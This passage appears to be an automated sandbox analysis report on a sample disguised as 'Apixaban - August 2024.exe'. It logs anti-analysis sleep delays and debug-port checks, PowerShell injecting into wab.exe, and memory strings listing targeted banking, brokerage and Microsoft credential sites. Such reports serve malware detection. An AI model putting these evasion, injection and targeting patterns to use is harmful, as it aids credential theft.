          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596964Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596856Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596746Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596605Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596439Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596202Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596078Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595968Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595859Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595748Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595625Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595515Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595406Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595297Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595187Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595077Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594953Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594843Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594729Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594621Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594515Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594406Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594295Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594178Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594034Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 593921Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 593812Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7069Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2705Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 6148Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3670Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1564Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep count: 32 > 30Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -29514790517935264s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2916Thread sleep count: 6148 > 30Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2916Thread sleep count: 3670 > 30Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599671s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599558s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599326s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599215s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -599105s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598929s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598812s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598702s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598468s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598359s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598250s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598138s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -598015s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597905s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597796s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597656s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597544s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597422s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597312s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597199s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -597078s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596964s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596856s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596746s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596605s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596439s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596312s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596202s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -596078s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595968s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595859s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595748s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595625s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595515s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595406s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595297s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595187s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -595077s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594953s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594843s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594729s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594621s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594515s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594406s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594295s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594178s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -594034s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -593921s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576Thread sleep time: -593812s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599558Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599326Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599215Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599105Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598929Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598812Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598702Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598468Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598250Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598138Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597905Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597796Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597656Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597544Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597422Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597312Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597199Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597078Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596964Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596856Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596746Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596605Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596439Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596202Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596078Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595968Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595859Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595748Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595625Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595515Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595406Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595297Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595187Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595077Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594953Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594843Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594729Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594621Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594515Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594406Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594295Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594178Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594034Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 593921Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 593812Jump to behavior
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: wab.exe, 0000000A.00000002.2640536687.00000000096A5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2640536687.0000000009638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3502
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3503
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_078357C0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,2_2_078357C0
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A60000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 251FF18Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
